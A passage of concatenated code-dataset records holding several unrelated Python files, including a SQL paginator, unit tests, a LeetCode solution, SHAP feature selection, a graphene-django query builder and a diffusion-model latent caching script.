__init__(\n self,\n sql_connect: SQLConnect,\n query_string: str,\n pg_query_string: Optional[str] = None,\n count_query_string: Optional[str] = None,\n pg_count_query_string: Optional[str] = None,\n query_params: Optional[QueryParams] = None,\n client_row_count: Optional[int] = None,\n client_page_size: Optional[int] = None,\n client_page_number: Optional[int] = None,\n ):\n self.logger = Logger.for_object(self)\n self.sql_connect: SQLConnect = sql_connect\n self.query_string: str = query_string\n self.pg_query_string: str = pg_query_string or \"\"\n self.count_query_string: str = count_query_string or \"\"\n self.pg_count_query_string: str = pg_count_query_string or \"\"\n self.query_params: Optional[QueryParams] = query_params\n self.page_size: int = client_page_size or 10\n self.page_number: int = client_page_number or 1\n self._row_count: Optional[int] = client_row_count\n\n @property\n def page_of_results(self) -> List[Dict[str, Any]]:\n if self.sql_connect.route.database_type == DatabaseType.POSTGRESQL and self.pg_query_string:\n results = self.sql_connect.get_dict_query_results(\n query_string=self.pg_query_string,\n query_params=self.query_params,\n )\n else:\n results = self.sql_connect.get_dict_query_results(\n query_string=self.query_string,\n query_params=self.query_params,\n )\n\n return list(results)\n\n @property\n def row_count(self) -> int:\n if self.count_query_string or self.pg_count_query_string:\n # Determines the total row_count from database.\n if (\n self.sql_connect.route.database_type == DatabaseType.POSTGRESQL\n and self.pg_count_query_string\n ):\n count_results_list = self.sql_connect.get_dict_query_results(\n self.pg_count_query_string, self.query_params\n )\n else:\n count_results_list = self.sql_connect.get_dict_query_results(\n self.count_query_string, self.query_params\n )\n\n count_results = count_results_list[0] if count_results_list else {}\n self._row_count = count_results.get(\"found_rows\", 0) if count_results else 0\n elif not self._row_count:\n self._row_count = self.sql_connect.get_row_count()\n\n self.logger.debug(f\">>>row_count: row_count<<<<: {self._row_count}\")\n return self._row_count # type: ignore\n\n @property\n def page_count(self) -> int:\n self.logger.debug(\n f\">>>page_count: row_count<<<<: {self.row_count}, page_size: {self.page_size}\"\n )\n return math.ceil(self.row_count / self.page_size)\n","repo_name":"voyager-gold/alti-network","sub_path":"external_api/external_api/utils/sql_paginator.py","file_name":"sql_paginator.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26521966913","text":"#!/usr/bin/env python3\n\"\"\"\nThis module contains all the code used to test the testee module.\n\"\"\"\n\n\nimport unittest\nfrom os import remove\nfrom os.path import realpath, dirname, join, isfile\n\nfrom auxi.tools.materialphysicalproperties import polynomial as testee\nfrom auxi.tools.materialphysicalproperties.core import DataSet\n\n\n__version__ = '0.3.6'\n__license__ = 'LGPL v3'\n__copyright__ = 'Copyright 2016, Ex Mente Technologies (Pty) Ltd'\n__author__ = 'Johan Zietsman'\n__credits__ = ['Johan Zietsman']\n__maintainer__ = 'Johan Zietsman'\n__email__ = 'johan.zietsman@ex-mente.co.za'\n__status__ = 'Planning'\n\n\nMODULE_PATH = dirname(realpath(__file__))\n\n\nclass PolynomialModelTTester(unittest.TestCase):\n \"\"\"\n The tester for the PolynomialModelT class.\n \"\"\"\n\n def _test_properties(self, model):\n self.assertEqual(model.material, 'Air')\n self.assertEqual(model.property, 'Density')\n self.assertEqual(model.symbol, 'rho')\n self.assertEqual(model.display_symbol, '\\\\rho')\n self.assertEqual(model.references, None)\n self.assertEqual(model.datasets, ['dataset-air-lienhard2015.csv'])\n\n coeffs = [2.207010112413834e-28, -1.8498386015487013e-24,\n 6.761238643515948e-21, -1.415594789179995e-17,\n 1.875696238757754e-14, -1.6406192076125332e-11,\n 9.591604317302061e-09, -3.714488392719117e-06,\n 0.0009239972475093591, -0.13882710545123356,\n 11.147387712425617]\n\n for c, cref in zip(model._coeffs, coeffs):\n self.assertAlmostEqual(c, cref)\n\n def test_create(self):\n \"\"\"\n Test whether a model is created successfully from a data set.\n \"\"\"\n dataset_path = join(MODULE_PATH, 'data/dataset-air-lienhard2015.csv')\n dataset = DataSet(dataset_path)\n model = testee.PolynomialModelT.create(dataset, 'rho', 10)\n self._test_properties(model)\n\n @unittest.skip(\"This test needs attention.\")\n def test_read(self):\n \"\"\"\n Test whether a model is created successfully by loading it from a json\n file.\n \"\"\"\n model = testee.PolynomialModelT.read(join(MODULE_PATH,\n 'data/air-rho.json'))\n self._test_properties(model)\n\n def test_write(self):\n \"\"\"\n Test whether a model is successfully written to a json file.\n \"\"\"\n dataset_path = join(MODULE_PATH, 'data/dataset-air-lienhard2015.csv')\n dataset = DataSet(dataset_path)\n\n json_path = join(MODULE_PATH, 'test.json')\n\n model = testee.PolynomialModelT.create(dataset, 'rho', 10)\n model.write(json_path)\n self.assertTrue(isfile(json_path))\n model = testee.PolynomialModelT.read(json_path)\n remove(json_path)\n self._test_properties(model)\n\n @unittest.skip(\"This test needs attention.\")\n def test_construct(self):\n \"\"\"\n Test whether a model is constructed successfully.\n \"\"\"\n\n file_path = join(MODULE_PATH, 'data/air-rho.json')\n\n model = testee.PolynomialModelT.read(file_path)\n testee.PolynomialModelT(model.material, model.property, model.symbol,\n model.display_symbol, model.units,\n model.references, model.datasets,\n model._coeffs)\n self._test_properties(model)\n\n @unittest.skip(\"This test needs attention.\")\n def test_calculate(self):\n \"\"\"\n Test whether the property value is calculated successfully.\n \"\"\"\n file_path = join(MODULE_PATH, 'data/air-rho.json')\n model = testee.PolynomialModelT.read(file_path)\n\n T = 100.0\n # self.assertEqual(model.calculate(T=T), 3.6026669128620208)\n self.assertEqual(model.calculate(T=T), 3.6049798036305774)\n T = 200.0\n self.assertEqual(model.calculate(T=T), 1.7581685372604081)\n T = 300.0\n self.assertEqual(model.calculate(T=T), 1.1791874628593089)\n T = 400.0\n self.assertEqual(model.calculate(T=T), 0.87918802181468259)\n T = 500.0\n self.assertEqual(model.calculate(T=T), 0.70171039180794637)\n T = 600.0\n self.assertEqual(model.calculate(T=T), 0.59118824960721206)\n\n @unittest.skip(\"This test needs attention. It throws an error in Travis.CI\")\n def test_plot(self):\n \"\"\"\n Test whether the plots are created.\n \"\"\"\n dataset_path = join(MODULE_PATH, 'data/dataset-air-lienhard2015.csv')\n dataset = DataSet(dataset_path)\n model = testee.PolynomialModelT.create(dataset, 'rho', 10)\n\n pdf_path = join(MODULE_PATH, 'test.pdf')\n\n model.plot(dataset, pdf_path)\n self.assertTrue(isfile(pdf_path))\n remove(pdf_path)\n\n @unittest.skip(\"This test needs attention.\")\n def test_call(self):\n \"\"\"\n Test whether the property value is calculated successfully via the\n __call__ magic method.\n \"\"\"\n file_path = join(MODULE_PATH, 'data/air-rho.json')\n model = testee.PolynomialModelT.read(file_path)\n\n T = 100.0\n self.assertEqual(model(T=T), 3.6026669128620208)\n T = 200.0\n self.assertEqual(model(T=T), 1.7581685372604081)\n T = 300.0\n self.assertEqual(model(T=T), 1.1791874628593089)\n T = 400.0\n self.assertEqual(model(T=T), 0.87918802181468259)\n T = 500.0\n self.assertEqual(model(T=T), 0.70171039180794637)\n T = 600.0\n self.assertEqual(model(T=T), 0.59118824960721206)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Ex-Mente/auxi.0","sub_path":"auxi/tools/materialphysicalproperties/polynomial_test.py","file_name":"polynomial_test.py","file_ext":"py","file_size_in_byte":5624,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"35"} +{"seq_id":"38427113481","text":"\"\"\"\nhttps://leetcode-cn.com/problems/subarray-product-less-than-k/\n\n给你一个整数数组 nums 和一个整数 k ,请你返回子数组内所有元素的乘积严格小于 k 的连续子数组的数目。\n\n示例 1:\n 输入:nums = [10,5,2,6], k = 100\n 输出:8\n 解释:8 个乘积小于 100 的子数组分别为:[10]、[5]、[2],、[6]、[10,5]、[5,2]、[2,6]、[5,2,6]。\n 需要注意的是 [10,5,2] 并不是乘积小于 100 的子数组。\n\n示例 2:\n 输入:nums = [1,2,3], k = 0\n 输出:0\n\n提示: \n 1 <= nums.length <= 3 * 10^4\n 1 <= nums[i] <= 1000\n 0 <= k <= 10^6\n\n\"\"\"\nfrom typing import List\nfrom math import log\nimport bisect\n\n\"\"\"方法一:二分查找\"\"\"\nclass Solution:\n def numSubarrayProductLessThanK(self, nums: List[int], k: int) -> int:\n if k == 0:\n return 0\n ans = 0\n n = len(nums)\n logPrefix = [0] * (n + 1)\n for i, num in enumerate(nums):\n logPrefix[i + 1] = logPrefix[i] + log(num)\n logK = log(k)\n for j in range(1, n + 1):\n l = bisect.bisect_right(logPrefix, logPrefix[j] - logK + 1e-10, 0, j)\n ans += j - l\n return ans\n\n\"\"\"方法二:滑动窗口\"\"\"\nclass Solution:\n def numSubarrayProductLessThanK(self, nums: List[int], k: int) -> int:\n ans = 0 # 子数组的数目\n prod = 1\n i = 0 # 左端点\n for j, num in enumerate(nums): # 子数组的右端点下标和值\n prod *= num # 乘以当前值\n while i <= j and prod >= k: # 当总乘积大于等于k时\n prod //= nums[i] # 去掉最左边数字\n i += 1 # 左指针右移一位\n ans += j - i + 1 # 以j为右端点的满足条件的子数组的个数\n return ans\n\nif __name__ == \"__main__\":\n nums = [10,5,2,6]\n k = 100\n sol = Solution()\n result = sol.numSubarrayProductLessThanK(nums, k)\n print (result)","repo_name":"jasonmayday/LeetCode","sub_path":"leetcode_algorithm/2_medium/0713_乘积小于K的子数组.py","file_name":"0713_乘积小于K的子数组.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"72260554340","text":"from selenium.webdriver.common.by import By\nimport time\n\nlink = 'http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/'\n\n\ndef test_search_button(browser):\n browser.get(link)\n time.sleep(15) #чтобы вы увидели кнопкку\n button = browser.find_elements(By.XPATH, '//*[@id=\"add_to_basket_form\"]/button')\n assert len(button) > 0, 'button not found'\n\n","repo_name":"Ulok-05/3.6.Stepic_homework","sub_path":"test_items.py","file_name":"test_items.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"44762066173","text":"import requests\nimport re\nimport os\n\n\ndef get_img_url(url):\n bing_text = requests.get(url).text\n return url+re.search('url: \\\\\"(.*?\\\\.jpg)\\\\\"', bing_text).group(1)\n\n\ndef save_img(image_url):\n r = requests.get(image_url, stream=True)\n with open(\"C:/Users/AlphaGo/Pictures/windows_background/background.jpg\", \"wb\") as fd:\n for chunk in r.iter_content(chunk_size=128):\n fd.write(chunk)\n\n\ndef empty_old_dir(path):\n for f in os.listdir(path):\n os.remove(path+'/'+f)\n\nif __name__ == '__main__':\n img_url = get_img_url(\"http://cn.bing.com\")\n empty_old_dir(\"C:/Users/AlphaGo/Pictures/windows_background\")\n save_img(img_url)","repo_name":"Negahead/nlp","sub_path":"bing_wallpaper.py","file_name":"bing_wallpaper.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"32484486528","text":"import pandas as pd \nimport numpy as np\nfrom typing import Union\nfrom scipy.sparse import csr_matrix, csc_matrix\nimport xgboost as xgb\nfrom sklearn.model_selection import train_test_split, cross_val_score\nimport sklearn\nimport shap\n\n\nclass ShapFeatureExtractor:\n \"\"\"\n Calculates shap feature importances based on xgboost classifier.\n \"\"\"\n\n def __init__(self, vocabulary):\n self.shap_values = None\n self.feature_strength_metric = None\n self.classes = []\n self.vocabulary = vocabulary\n \n def fit(self, X, y):\n \"\"\"\n Fit feature extractor\n Arguments:\n X - word counts (output from CountVectorizer)\n y - array-like with class labels for X\n \"\"\"\n if isinstance(y, np.ndarray):\n classes = np.unique(y) \n elif isinstance(y, (pd.Series, pd.DataFrame)):\n classes = y.unique()\n else:\n raise ValueError(f'Unexpected type for y: {type(y)}. y must be array like')\n \n self.classes = classes\n\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3)\n\n train_dmatrix = xgb.DMatrix(X_train, label=y_train)\n test_dmatrix = xgb.DMatrix(X_test, label=y_test)\n\n if len(classes) > 2:\n param = {'max_depth':25, 'eta':0.05, 'lambda': 0.001, 'objective':'multi:softprob', 'num_class': len(classes) }\n else:\n param = {'max_depth':25, 'eta':0.05, 'lambda': 0.001, 'objective':'binary:logistic' }\n \n model = xgb.train(param, dtrain=train_dmatrix, evals=[(train_dmatrix, 'train'), (test_dmatrix, 'test')], num_boost_round=1000, early_stopping_rounds=100, verbose_eval=False)\n\n explainer = shap.TreeExplainer(model, feature_names=self.vocabulary)\n shap_values = explainer.shap_values(test_dmatrix, check_additivity=False)\n\n self.shap_values = shap_values\n\n\n if len(classes) > 2:\n # for multiclass classification, shap values are unique per each category, so we take the max \n # across the classes (just like with filtering methods, where applicable)\n shap_vals_avg_per_class_list = []\n for cls in shap_values:\n shap_vals_avg_per_class_list.append(np.mean(np.abs(cls), axis=0) )\n shap_vals_avg_per_class = np.vstack(shap_vals_avg_per_class_list)\n self.feature_strength_metric = np.maximum.reduce(shap_vals_avg_per_class)\n else: \n self.feature_strength_metric = np.mean(np.abs(shap_values), axis=0) \n \n def get_n_words_shap(self, n_words):\n \"\"\"\n Get n_words most important words from vocabulary per class according to shap values. Will return duplicates per class label for consistency with other methods.\n \"\"\"\n\n\n return self.vocabulary[self.feature_strength_metric.argsort()[-n_words:]]\n \n def filter_n_best(self, X, n_best):\n \"\"\"\n Leave n_best terms.\n Arguments:\n X - dataset to filter out terms from \n n_best - number of terms to leave\n Returns:\n X_filtered - filtered dataset\n vocabulary_filtered - vocabulary of the new filtered dataset (will have length of n_best)\n \"\"\"\n selected_index = self.feature_strength_metric.argsort()[-n_best:]\n if isinstance(X, pd.DataFrame):\n X_filtered = X.iloc[:, selected_index]\n else:\n X_filtered = X[:, selected_index]\n vocabulary_filtered = self.vocabulary[selected_index]\n\n return X_filtered, vocabulary_filtered\n\n def remove_n_best(self, X, n_words):\n \"\"\"\n Remove n_best features.\n Arguments:\n X - dataset to filter out terms from\n n_words - [int] number of terms to remove\n vocabulary - [list] list of words present in the dataset\n Returns:\n X_filtered - filtered dataset\n vocabulary_filtered - dropped words\n \"\"\"\n # selected_index = self.feature_strength_metric.argsort()[:-n_words]\n selected_index = self.feature_strength_metric.argsort()[n_words:]\n dropped_index = self.feature_strength_metric.argsort()[-n_words:]\n\n if isinstance(X, pd.DataFrame):\n X_filtered = X.iloc[:, selected_index]\n else:\n X_filtered = X[:, selected_index]\n vocabulary_filtered = self.vocabulary[dropped_index]\n\n return X_filtered, vocabulary_filtered\n\n\nclass LinearForwardSearch():\n \n estimator = None\n ranker = None\n vocabulary = None\n selected_idx = None\n epsillon = 1E-4 \n\n def __init__(self, estimator, ranker, vocabulary):\n \"\"\"\n Linear Forward Search feature extractor. Ref: https://researchcommons.waikato.ac.nz/handle/10289/2205\n Arguments:\n estimator - estimator to use for feature subset evaluation\n ranker - filtering feature extractor to use for initial feature ranking\n vocabulary - list of words present in the dataset\n \"\"\"\n self.estimator = estimator\n self.ranker = ranker\n self.vocabulary = vocabulary\n\n def forward_search_step(self, X, y, k, R, selected_index):\n estimator = sklearn.base.clone(self.estimator)\n ranked_features_idx = R[-(k+len(selected_index)):]\n features_to_check = [idx for idx in ranked_features_idx if idx not in selected_index]\n\n best_score = 0\n best_idx = -1\n\n for feature in features_to_check:\n curr_feature_list = np.append(selected_index, feature)\n if isinstance(X, pd.DataFrame):\n X_ = X.iloc[:, curr_feature_list]\n else:\n X_ = X[:,curr_feature_list]\n scores = cross_val_score(estimator, X_, y, cv=5, scoring='roc_auc', n_jobs=-1)\n score = np.mean(scores)\n if score > best_score:\n best_score = score \n best_idx = feature\n \n return np.append(selected_index, best_idx).astype(int), best_score\n\n\n\n def fit(self, X, y, k, n_words = None):\n self.ranker.fit(X, y)\n R = self.ranker.feature_strength_metric.argsort()\n\n if n_words is None:\n selected_idx = []\n best_score = 0\n for i in range(X.shape[1]):\n selected_idx, score = self.forward_search_step(X, y, k, R, selected_idx)\n if (score - best_score) < self.epsillon:\n break\n best_score = score\n else:\n selected_idx = []\n for i in range(n_words):\n selected_idx, score = self.forward_search_step(X, y, k, R, selected_idx)\n \n self.selected_idx = R[selected_idx]\n return self.selected_idx\n \n def get_selected_words_lfs(self):\n return self.vocabulary[self.selected_idx]\n \n\n","repo_name":"trotskii/shapley-values-based-feature-selection-benchmarking","sub_path":"src/preprocessing/feature_extraction/text/wrapping.py","file_name":"wrapping.py","file_ext":"py","file_size_in_byte":6878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"5997447228","text":"from typing import Dict, Optional, Type\n\nimport graphene\nfrom graphene.utils.str_converters import to_snake_case\nfrom graphene_django import DjangoObjectType\n\nfrom simple_graphql.django.fields import DjangoAutoConnectionField\nfrom simple_graphql.django.fields.node import DjangoAutoNode\nfrom simple_graphql.django.types import ModelClass, ModelSchemaConfig\n\n\ndef build_ordering_enum(\n *, model_cls: ModelClass, args: ModelSchemaConfig\n) -> Optional[graphene.Enum]:\n if not args.ordering_fields:\n return None\n return graphene.Enum(\n f\"{model_cls.__name__}Ordering\",\n [\n (f\"{x}_{direction}\".upper(), x if direction == \"asc\" else f\"-{x}\")\n for x in (args.ordering_fields or [])\n for direction in (\"asc\", \"desc\")\n ],\n )\n\n\ndef build_query_fields(\n *,\n model_cls: ModelClass,\n node_cls: Type[DjangoObjectType],\n) -> Dict[str, graphene.Field]:\n query_name = to_snake_case(model_cls.__name__)\n return {\n f\"get_{query_name}\": DjangoAutoNode.Field(node_cls),\n f\"list_{query_name}\": DjangoAutoConnectionField(node_cls=node_cls),\n }\n","repo_name":"JoaRiski/django-simple-graphql","sub_path":"simple_graphql/django/schema/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"38313442335","text":"#!/usr/bin/env python3\nimport psycopg2\nimport sys\nimport matplotlib.pyplot as plt\n\n\nSQL_SELECT_POPULARITY = \"\"\"\nwith blocks_places as (select distinct pxca.id_place, cb.id_block from carnival_block cb \njoin carnival_block_route cbr on cbr.id_block = cb.id_block\njoin placexcarnival_address pxca on pxca.id_address = cbr.id_address\n),\ntt_block as (select cb.id_block, count(txs.id_tweet) as ctt from carnival_block cb\njoin tweet_search_control tsc on tsc.id_block = cb.id_block\njoin tweetxsearch txs on txs.id_search = tsc.id_search\ngroup by 1 \norder by 2 desc)\n\nselect bp.id_block, c.\"name\", c.\"date\", coalesce(tt.ctt, 0), count (r.stars) as c, avg(r.stars), \n((count(r.stars)::decimal/2537) * (avg(r.stars)/5) + \n(((coalesce(tt.ctt::decimal, 0) ) / 5805)))/2 as popularidade\nfrom blocks_places bp\njoin review r on r.id_place = bp.id_place\njoin carnival_block c on c.id_block = bp.id_block\nleft join tt_block tt on tt.id_block = c.id_block\ngroup by bp.id_block, c.\"name\", c.\"date\", tt.ctt\norder by popularidade desc\n\"\"\"\n\ncon = psycopg2.connect(host='localhost', port=25432, database='mob',\n user='mob', password='mob')\ncursor = con.cursor()\n\ncursor.execute(SQL_SELECT_POPULARITY)\npopularity = cursor.fetchall()\n\nx = []\nx_google = []\nx_twitter = []\n\ny = []\ny_google = []\ny_twitter = []\n\ncount = []\n\nfor p in popularity:\n # if p[-1] < 0.2:\n x.append(p[3] + p[4])\n x_google.append(p[4])\n x_twitter.append(p[3])\n\n y.append(p[-1])\n y_google.append(((p[4]/2537) * (float(p[5])/5)))\n y_twitter.append((p[3]/5805))\n #else:\n # count.append(p[-1])\n\n#plt.hist(count, bins=3)\nfig, ax = plt.subplots()\nax.scatter(x, y, label='Twitter e Google Review')\nax.scatter(x_google, y_google, label=\"Google Review\")\nax.scatter(x_twitter, y_twitter, label=\"Twitter\")\n\nax.set_xlabel(r'interações em redes sociais')\nax.set_ylabel(r'popularidade')\nax.set_title('Popularidade e interações Twitter/Google Review')\n\nplt.legend();\n\nplt.show()\n","repo_name":"Pongelupe/mobility-studies","sub_path":"google_places_searcher/review_spider/user_review/scatter_popularity.py","file_name":"scatter_popularity.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"38"} +{"seq_id":"35562384718","text":"import argparse\nimport os\nimport json\n\nfrom tqdm import tqdm\nimport numpy as np\nfrom PIL import Image\nimport cv2\nimport torch\nfrom torchvision import transforms\n\nimport library.model_util as model_util\nimport library.train_util as train_util\n\nDEVICE = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\nIMAGE_TRANSFORMS = transforms.Compose(\n [\n transforms.ToTensor(),\n transforms.Normalize([0.5], [0.5]),\n ]\n)\n\n\ndef collate_fn_remove_corrupted(batch):\n \"\"\"Collate function that allows to remove corrupted examples in the\n dataloader. It expects that the dataloader returns 'None' when that occurs.\n The 'None's in the batch are removed.\n \"\"\"\n # Filter out all the Nones (corrupted examples)\n batch = list(filter(lambda x: x is not None, batch))\n return batch\n\n\ndef get_latents(vae, images, weight_dtype):\n img_tensors = [IMAGE_TRANSFORMS(image) for image in images]\n img_tensors = torch.stack(img_tensors)\n img_tensors = img_tensors.to(DEVICE, weight_dtype)\n with torch.no_grad():\n latents = vae.encode(img_tensors).latent_dist.sample().float().to(\"cpu\").numpy()\n return latents\n\n\ndef get_npz_filename_wo_ext(data_dir, image_key, is_full_path, flip):\n if is_full_path:\n base_name = os.path.splitext(os.path.basename(image_key))[0]\n else:\n base_name = image_key\n if flip:\n base_name += '_flip'\n return os.path.join(data_dir, base_name)\n\n\ndef main(args):\n image_paths = train_util.glob_images(args.train_data_dir)\n print(f\"found {len(image_paths)} images.\")\n\n if os.path.exists(args.in_json):\n print(f\"loading existing metadata: {args.in_json}\")\n with open(args.in_json, \"rt\", encoding='utf-8') as f:\n metadata = json.load(f)\n else:\n print(f\"no metadata / メタデータファイルがありません: {args.in_json}\")\n return\n\n weight_dtype = torch.float32\n if args.mixed_precision == \"fp16\":\n weight_dtype = torch.float16\n elif args.mixed_precision == \"bf16\":\n weight_dtype = torch.bfloat16\n\n vae = model_util.load_vae(args.model_name_or_path, weight_dtype)\n vae.eval()\n vae.to(DEVICE, dtype=weight_dtype)\n\n # bucketのサイズを計算する\n max_reso = tuple([int(t) for t in args.max_resolution.split(',')])\n assert len(max_reso) == 2, f\"illegal resolution (not 'width,height') / 画像サイズに誤りがあります。'幅,高さ'で指定してください: {args.max_resolution}\"\n\n bucket_resos, bucket_aspect_ratios = model_util.make_bucket_resolutions(\n max_reso, args.min_bucket_reso, args.max_bucket_reso)\n\n # 画像をひとつずつ適切なbucketに割り当てながらlatentを計算する\n bucket_aspect_ratios = np.array(bucket_aspect_ratios)\n buckets_imgs = [[] for _ in range(len(bucket_resos))]\n bucket_counts = [0 for _ in range(len(bucket_resos))]\n img_ar_errors = []\n\n def process_batch(is_last):\n for j in range(len(buckets_imgs)):\n bucket = buckets_imgs[j]\n if (is_last and len(bucket) > 0) or len(bucket) >= args.batch_size:\n latents = get_latents(vae, [img for _, _, img in bucket], weight_dtype)\n\n for (image_key, _, _), latent in zip(bucket, latents):\n npz_file_name = get_npz_filename_wo_ext(args.train_data_dir, image_key, args.full_path, False)\n np.savez(npz_file_name, latent)\n\n # flip\n if args.flip_aug:\n latents = get_latents(vae, [img[:, ::-1].copy() for _, _, img in bucket], weight_dtype) # copyがないとTensor変換できない\n\n for (image_key, _, _), latent in zip(bucket, latents):\n npz_file_name = get_npz_filename_wo_ext(args.train_data_dir, image_key, args.full_path, True)\n np.savez(npz_file_name, latent)\n\n bucket.clear()\n\n # 読み込みの高速化のためにDataLoaderを使うオプション\n if args.max_data_loader_n_workers is not None:\n dataset = train_util.ImageLoadingDataset(image_paths)\n data = torch.utils.data.DataLoader(dataset, batch_size=1, shuffle=False,\n num_workers=args.max_data_loader_n_workers, collate_fn=collate_fn_remove_corrupted, drop_last=False)\n else:\n data = [[(None, ip)] for ip in image_paths]\n\n for data_entry in tqdm(data, smoothing=0.0):\n if data_entry[0] is None:\n continue\n\n img_tensor, image_path = data_entry[0]\n if img_tensor is not None:\n image = transforms.functional.to_pil_image(img_tensor)\n else:\n try:\n image = Image.open(image_path)\n if image.mode != 'RGB':\n image = image.convert(\"RGB\")\n except Exception as e:\n print(f\"Could not load image path / 画像を読み込めません: {image_path}, error: {e}\")\n continue\n\n image_key = image_path if args.full_path else os.path.splitext(os.path.basename(image_path))[0]\n if image_key not in metadata:\n metadata[image_key] = {}\n\n # 本当はこの部分もDataSetに持っていけば高速化できるがいろいろ大変\n aspect_ratio = image.width / image.height\n ar_errors = bucket_aspect_ratios - aspect_ratio\n bucket_id = np.abs(ar_errors).argmin()\n reso = bucket_resos[bucket_id]\n ar_error = ar_errors[bucket_id]\n img_ar_errors.append(abs(ar_error))\n\n # どのサイズにリサイズするか→トリミングする方向で\n if ar_error <= 0: # 横が長い→縦を合わせる\n scale = reso[1] / image.height\n else:\n scale = reso[0] / image.width\n\n resized_size = (int(image.width * scale + .5), int(image.height * scale + .5))\n\n # print(image.width, image.height, bucket_id, bucket_resos[bucket_id], ar_errors[bucket_id], resized_size,\n # bucket_resos[bucket_id][0] - resized_size[0], bucket_resos[bucket_id][1] - resized_size[1])\n\n assert resized_size[0] == reso[0] or resized_size[1] == reso[\n 1], f\"internal error, resized size not match: {reso}, {resized_size}, {image.width}, {image.height}\"\n assert resized_size[0] >= reso[0] and resized_size[1] >= reso[\n 1], f\"internal error, resized size too small: {reso}, {resized_size}, {image.width}, {image.height}\"\n\n # 既に存在するファイルがあればshapeを確認して同じならskipする\n if args.skip_existing:\n npz_files = [get_npz_filename_wo_ext(args.train_data_dir, image_key, args.full_path, False) + \".npz\"]\n if args.flip_aug:\n npz_files.append(get_npz_filename_wo_ext(args.train_data_dir, image_key, args.full_path, True) + \".npz\")\n\n found = True\n for npz_file in npz_files:\n if not os.path.exists(npz_file):\n found = False\n break\n\n dat = np.load(npz_file)['arr_0']\n if dat.shape[1] != reso[1] // 8 or dat.shape[2] != reso[0] // 8: # latentsのshapeを確認\n found = False\n break\n if found:\n continue\n\n # 画像をリサイズしてトリミングする\n # PILにinter_areaがないのでcv2で……\n image = np.array(image)\n image = cv2.resize(image, resized_size, interpolation=cv2.INTER_AREA)\n if resized_size[0] > reso[0]:\n trim_size = resized_size[0] - reso[0]\n image = image[:, trim_size//2:trim_size//2 + reso[0]]\n elif resized_size[1] > reso[1]:\n trim_size = resized_size[1] - reso[1]\n image = image[trim_size//2:trim_size//2 + reso[1]]\n assert image.shape[0] == reso[1] and image.shape[1] == reso[0], f\"internal error, illegal trimmed size: {image.shape}, {reso}\"\n\n # # debug\n # cv2.imwrite(f\"r:\\\\test\\\\img_{i:05d}.jpg\", image[:, :, ::-1])\n\n # バッチへ追加\n buckets_imgs[bucket_id].append((image_key, reso, image))\n bucket_counts[bucket_id] += 1\n metadata[image_key]['train_resolution'] = reso\n\n # バッチを推論するか判定して推論する\n process_batch(False)\n\n # 残りを処理する\n process_batch(True)\n\n for i, (reso, count) in enumerate(zip(bucket_resos, bucket_counts)):\n print(f\"bucket {i} {reso}: {count}\")\n img_ar_errors = np.array(img_ar_errors)\n print(f\"mean ar error: {np.mean(img_ar_errors)}\")\n\n # metadataを書き出して終わり\n print(f\"writing metadata: {args.out_json}\")\n with open(args.out_json, \"wt\", encoding='utf-8') as f:\n json.dump(metadata, f, indent=2)\n print(\"done!\")\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"train_data_dir\", type=str, help=\"directory for train images / 学習画像データのディレクトリ\")\n parser.add_argument(\"in_json\", type=str, help=\"metadata file to input / 読み込むメタデータファイル\")\n parser.add_argument(\"out_json\", type=str, help=\"metadata file to output / メタデータファイル書き出し先\")\n parser.add_argument(\"model_name_or_path\", type=str, help=\"model name or path to encode latents / latentを取得するためのモデル\")\n parser.add_argument(\"--v2\", action='store_true',\n help='not used (for backward compatibility) / 使用されません(互換性のため残してあります)')\n parser.add_argument(\"--batch_size\", type=int, default=1, help=\"batch size in inference / 推論時のバッチサイズ\")\n parser.add_argument(\"--max_data_loader_n_workers\", type=int, default=None,\n help=\"enable image reading by DataLoader with this number of workers (faster) / DataLoaderによる画像読み込みを有効にしてこのワーカー数を適用する(読み込みを高速化)\")\n parser.add_argument(\"--max_resolution\", type=str, default=\"512,512\",\n help=\"max resolution in fine tuning (width,height) / fine tuning時の最大画像サイズ 「幅,高さ」(使用メモリ量に関係します)\")\n parser.add_argument(\"--min_bucket_reso\", type=int, default=256, help=\"minimum resolution for buckets / bucketの最小解像度\")\n parser.add_argument(\"--max_bucket_reso\", type=int, default=1024, help=\"maximum resolution for buckets / bucketの最小解像度\")\n parser.add_argument(\"--mixed_precision\", type=str, default=\"no\",\n choices=[\"no\", \"fp16\", \"bf16\"], help=\"use mixed precision / 混合精度を使う場合、その精度\")\n parser.add_argument(\"--full_path\", action=\"store_true\",\n help=\"use full path as image-key in metadata (supports multiple directories) / メタデータで画像キーをフルパスにする(複数の学習画像ディレクトリに対応)\")\n parser.add_argument(\"--flip_aug\", action=\"store_true\",\n help=\"flip augmentation, save latents for flipped images / 左右反転した画像もlatentを取得、��存する\")\n parser.add_argument(\"--skip_existing\", action=\"store_true\",\n help=\"skip images if npz already exists (both normal and flipped exists if flip_aug is enabled) / npzが既に存在する画像をスキップする(flip_aug有効時は通常、反転の両方が存在する画像をスキップ)\")\n\n args = parser.parse_args()\n main(args)\n","repo_name":"egkv/kohya-trainer-v12","sub_path":"finetune/prepare_buckets_latents.py","file_name":"prepare_buckets_latents.py","file_ext":"py","file_size_in_byte":10916,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} 